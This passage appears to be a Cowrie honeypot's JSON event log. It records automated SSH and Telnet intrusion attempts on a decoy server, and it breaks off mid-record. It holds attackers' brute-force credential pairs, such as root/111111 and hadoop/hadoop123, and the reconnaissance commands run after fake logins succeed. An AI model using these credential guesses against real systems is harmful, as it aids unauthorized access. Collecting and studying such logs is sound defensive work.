{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:18:03.536267Z","src_ip":"212.227.235.229","session":"d5a4be6fabe2"}
{"eventid":"cowrie.login.success","username":"root","password":"root@123","message":"login attempt [root/root@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:18:04.296079Z","src_ip":"212.227.235.229","session":"d5a4be6fabe2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:18:04.890136Z","src_ip":"212.227.235.229","session":"d5a4be6fabe2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:18:04.890648Z","src_ip":"212.227.235.229","session":"d5a4be6fabe2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:18:05.144517Z","src_ip":"212.227.235.229","session":"d5a4be6fabe2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:18:05.145607Z","src_ip":"212.227.235.229","session":"d5a4be6fabe2"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":10531,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3c415182519","protocol":"ssh","message":"New connection: 186.225.142.90:10531 (1.2.3.4:22) [session: d3c415182519]","sensor":"my-vps","timestamp":"2025-08-28T07:18:08.056741Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:18:08.671917Z","src_ip":"186.225.142.90","session":"d3c415182519"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:18:08.672576Z","src_ip":"186.225.142.90","session":"d3c415182519"}
{"eventid":"cowrie.login.success","username":"root","password":"0899858153","message":"login attempt [root/0899858153] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:18:11.179467Z","src_ip":"186.225.142.90","session":"d3c415182519"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55648,"dst_ip":"1.2.3.4","dst_port":22,"session":"1648330d6f1a","protocol":"ssh","message":"New connection: 212.227.125.160:55648 (1.2.3.4:22) [session: 1648330d6f1a]","sensor":"my-vps","timestamp":"2025-08-28T07:18:12.032854Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:18:12.076828Z","src_ip":"212.227.125.160","session":"1648330d6f1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:18:12.219118Z","src_ip":"186.225.142.90","session":"d3c415182519"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T07:18:12.219837Z","src_ip":"186.225.142.90","session":"d3c415182519"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:18:12.257500Z","src_ip":"212.227.125.160","session":"1648330d6f1a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:18:12.825763Z","src_ip":"186.225.142.90","session":"d3c415182519"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:18:13.156621Z","src_ip":"212.227.125.160","session":"1648330d6f1a"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:18:13.222775Z","src_ip":"186.225.142.90","session":"d3c415182519"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:18:13.744792Z","src_ip":"212.227.125.160","session":"1648330d6f1a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:18:13.745519Z","src_ip":"212.227.125.160","session":"1648330d6f1a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:18:13.969999Z","src_ip":"212.227.125.160","session":"1648330d6f1a"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:18:13.971024Z","src_ip":"212.227.125.160","session":"1648330d6f1a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38830,"dst_ip":"1.2.3.4","dst_port":22,"session":"76e47699400c","protocol":"ssh","message":"New connection: 212.227.235.229:38830 (1.2.3.4:22) [session: 76e47699400c]","sensor":"my-vps","timestamp":"2025-08-28T07:18:18.424202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:18:18.425117Z","src_ip":"212.227.235.229","session":"76e47699400c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:18:18.678741Z","src_ip":"212.227.235.229","session":"76e47699400c"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:18:19.442063Z","src_ip":"212.227.235.229","session":"76e47699400c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:18:20.027973Z","src_ip":"212.227.235.229","session":"76e47699400c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:18:20.028645Z","src_ip":"212.227.235.229","session":"76e47699400c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:18:20.284069Z","src_ip":"212.227.235.229","session":"76e47699400c"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:18:20.285211Z","src_ip":"212.227.235.229","session":"76e47699400c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35216,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2d51c502d3a","protocol":"ssh","message":"New connection: 212.227.125.160:35216 (1.2.3.4:22) [session: b2d51c502d3a]","sensor":"my-vps","timestamp":"2025-08-28T07:18:28.339230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:18:28.340156Z","src_ip":"212.227.125.160","session":"b2d51c502d3a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:18:28.574156Z","src_ip":"212.227.125.160","session":"b2d51c502d3a"}
{"eventid":"cowrie.login.failed","username":"wang","password":"123456","message":"login attempt [wang/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:18:29.452993Z","src_ip":"212.227.125.160","session":"b2d51c502d3a"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":56636,"dst_ip":"1.2.3.4","dst_port":23,"session":"cd4cde0a3f12","protocol":"telnet","message":"New connection: 8.222.212.69:56636 (1.2.3.4:23) [session: cd4cde0a3f12]","sensor":"my-vps","timestamp":"2025-08-28T07:18:29.808757Z"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:18:30.677310Z","src_ip":"212.227.125.160","session":"b2d51c502d3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60434,"dst_ip":"1.2.3.4","dst_port":22,"session":"5addbb7ba11a","protocol":"ssh","message":"New connection: 212.227.235.229:60434 (1.2.3.4:22) [session: 5addbb7ba11a]","sensor":"my-vps","timestamp":"2025-08-28T07:18:34.862571Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:18:34.863633Z","src_ip":"212.227.235.229","session":"5addbb7ba11a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:18:35.127908Z","src_ip":"212.227.235.229","session":"5addbb7ba11a"}
{"eventid":"cowrie.login.failed","username":"wang","password":"123456","message":"login attempt [wang/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:18:35.923089Z","src_ip":"212.227.235.229","session":"5addbb7ba11a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:18:37.190156Z","src_ip":"212.227.235.229","session":"5addbb7ba11a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59012,"dst_ip":"1.2.3.4","dst_port":22,"session":"0740880e5d83","protocol":"ssh","message":"New connection: 212.227.125.160:59012 (1.2.3.4:22) [session: 0740880e5d83]","sensor":"my-vps","timestamp":"2025-08-28T07:18:44.784808Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:18:44.843508Z","src_ip":"212.227.125.160","session":"0740880e5d83"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:18:45.024193Z","src_ip":"212.227.125.160","session":"0740880e5d83"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop123","message":"login attempt [hadoop/hadoop123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:18:45.977611Z","src_ip":"212.227.125.160","session":"0740880e5d83"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:18:47.217135Z","src_ip":"212.227.125.160","session":"0740880e5d83"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51210,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea9798fa9e18","protocol":"ssh","message":"New connection: 212.227.235.229:51210 (1.2.3.4:22) [session: ea9798fa9e18]","sensor":"my-vps","timestamp":"2025-08-28T07:18:51.460435Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:18:51.461384Z","src_ip":"212.227.235.229","session":"ea9798fa9e18"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:18:51.715160Z","src_ip":"212.227.235.229","session":"ea9798fa9e18"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop123","message":"login attempt [hadoop/hadoop123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:18:52.477550Z","src_ip":"212.227.235.229","session":"ea9798fa9e18"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:18:53.733064Z","src_ip":"212.227.235.229","session":"ea9798fa9e18"}
{"eventid":"cowrie.session.closed","duration":31.309317111968994,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:19:01.118002Z","src_ip":"8.222.212.69","session":"cd4cde0a3f12"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53046,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5efe41672bd","protocol":"ssh","message":"New connection: 212.227.125.160:53046 (1.2.3.4:22) [session: b5efe41672bd]","sensor":"my-vps","timestamp":"2025-08-28T07:19:01.279973Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:19:01.301968Z","src_ip":"212.227.125.160","session":"b5efe41672bd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@